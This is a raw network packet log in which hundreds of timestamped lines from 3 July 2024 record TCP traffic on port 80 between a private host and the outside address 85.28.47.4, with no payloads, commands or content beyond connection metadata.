                                                                Jul 3, 2024 08:38:17.199717999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199728012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199733973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.199738026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199748039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199759960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.199764013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199774981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199779987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.199784994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199795961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199795961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.199805975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199815989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199826002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199831963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.199860096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.200659990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200670958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200680971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200690985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200700045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200705051 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.200716019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200726986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200726986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.200737000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200745106 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.200747013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200757980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200761080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.200767994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200778008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200788975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200789928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.200798988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200809956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.200820923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.200838089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.201581955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201592922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201603889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201613903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201623917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201633930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201637030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.201644897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201653957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201659918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.201664925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201673985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201675892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.201684952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201694965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.201699018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201709986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201715946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.201719999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201725006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.201730013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.201760054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.201786995 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.202457905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202470064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202478886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202488899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202500105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202507973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.202511072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202521086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202532053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202542067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202552080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.202553034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.202572107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.202594042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283222914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283256054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283267021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283291101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283319950 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283353090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283364058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283374071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283400059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283412933 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283580065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283591032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283601046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283611059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283612013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283622980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283632040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283644915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283665895 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283684969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.283962011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283972979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283982038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283992052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.283998966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284003019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284013033 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284039021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284271002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284281969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284292936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284323931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284476042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284492970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284502983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284512997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284513950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284524918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284543037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284573078 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284931898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284941912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284951925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284961939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284971952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284979105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284987926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.284996033 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.284997940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285007954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285017967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285027981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285032034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285033941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285043955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285048962 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285054922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285064936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285074949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285103083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285804987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285815954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285825968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285835981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285841942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285845995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285856962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285862923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285880089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285885096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285891056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285906076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285906076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285917044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285928011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285928011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285938025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285943031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285948038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285959005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.285969019 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.285995960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.286751032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286762953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286767960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286781073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286791086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286801100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286809921 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.286811113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286822081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286827087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.286832094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286843061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286843061 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.286851883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286858082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.286861897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286873102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286883116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286889076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.286894083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.286931992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.337558985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.342343092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512134075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512161016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512170076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512212038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512262106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512273073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512285948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512382030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.512422085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.512499094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512511015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512521982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512546062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.512562990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.512645006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512823105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.512826920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512860060 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.512868881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512880087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.512902021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.512922049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513029099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513040066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513050079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513075113 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513104916 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513232946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513243914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513253927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513264894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513276100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513281107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513288021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513313055 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513334990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513633966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513643980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513659954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513669968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513680935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513690948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513691902 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513701916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513712883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513721943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513722897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.513744116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.513761997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514163017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514173985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514183998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514194012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514199972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514204979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514214993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514218092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514225960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514235973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514245987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514247894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514256954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514266968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514266968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514287949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514303923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514761925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514772892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514784098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514799118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514801025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514811039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514821053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514832973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514843941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514852047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514853954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514866114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514874935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514875889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514888048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514897108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514900923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514908075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.514928102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.514940023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.515584946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515594959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515608072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515618086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515629053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515630960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.515645027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515655994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515662909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.515666962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515677929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515681982 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.515687943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515700102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515703917 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.515710115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515721083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515722036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.515732050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.515753031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.515780926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.516432047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516443968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516474009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.516607046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516618967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516628981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516638994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516639948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.516649008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516659975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516669989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516670942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.516680002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516690016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516700029 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.516700983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516711950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516721964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.516722918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516733885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.516741991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.516762018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.517565012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517575979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517585993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517596006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517606020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517615080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.517616034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517627001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517637968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517642975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.517647982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517657995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517662048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.517668962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517677069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.517679930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517689943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517700911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517707109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.517712116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.517733097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.517748117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.518368006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518379927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518393993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518405914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518414974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.518436909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.518496037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518507004 CEST804971085.28.47.4192.168.2.6
